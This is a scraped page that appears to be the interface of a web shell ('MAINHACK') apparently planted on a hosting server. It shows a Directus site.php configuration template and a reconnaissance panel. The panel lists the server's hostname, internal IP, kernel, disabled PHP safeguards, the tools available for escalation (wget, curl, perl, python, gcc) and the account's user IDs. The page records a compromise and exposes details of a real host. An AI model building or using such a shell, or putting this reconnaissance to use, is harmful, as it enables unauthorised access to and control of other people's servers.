[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: site.php
File is not writable. Editing disabled.
<?php return [ 'database' => [ 'type' => 'mysql', 'host' => '[[softdbhost]]', 'port' => 3306, 'name' => '[[softdb]]', 'username' => '[[softdbuser]]', 'password' => '[[softdbpass]]', 'engine' => 'InnoDB', 'charset' => 'utf8mb4', // Remove 'host' above when using sockets 'socket' => '', ], 'cookie' => [ 'same_site' => 'Lax', 'secure' => false ], 'cors' => [ 'enabled' => true, 'origin' => array ( 0 => '*', ), 'methods' => array ( 0 => 'GET', 1 => 'POST', 2 => 'PUT', 3 => 'PATCH', 4 => 'DELETE', 5 => 'HEAD', ), 'headers' => array ( ), 'exposed_headers' => array ( ), 'max_age' => 600, 'credentials' => true, ], 'rate_limit' => [ 'enabled' => false, 'limit' => 100, 'interval' => 60, 'adapter' => 'redis', 'host' => '127.0.0.1', 'port' => 6379, 'timeout' => 10, ], 'storage' => [ 'adapter' => 'local', 'root' => 'public/uploads/[[site_name]]/originals', 'root_url' => '/uploads/[[site_name]]/originals', 'thumb_root' => 'public/uploads/[[site_name]]/generated', // 'key' => '', // 'secret' => '', // 'region' => '', // 'version' => '', // 'bucket' => '', // 'options' => '', // 'endpoint' => '', // 'proxy_downloads' => '', ], 'mail' => [ 'default' => [ 'transport' => 'sendmail', // 'sendmail' => '', // 'host' => '', // 'port' => '', // 'username' => '', // 'password' => '', // 'encryption' => '', 'from' => 'admin@example.com' ], ], 'cache' => [ 'enabled' => false, 'response_ttl' => 3600, 'pool' => [ // 'adapter' => '', // 'path' => '', // 'host' => '', // 'port' => '', ], ], 'auth' => [ 'secret_key' => '[[secret_key]]', 'public_key' => '[[public_key]]', 'ttl' => 20, 'social_providers' => [ // 'okta' => '', // 'github' => '', // 'facebook' => '', // 'google' => '', // 'twitter' => '', ], ], 'hooks' => [ 'actions' => [], 'filters' => [], ], 'tableBlacklist' => [], 'env' => 'production', 'logger' => [ 'path' => '[[softpath]]/src/core/Directus/Util/Installation/../../../../../logs', ], ];
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 700.12 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: N/A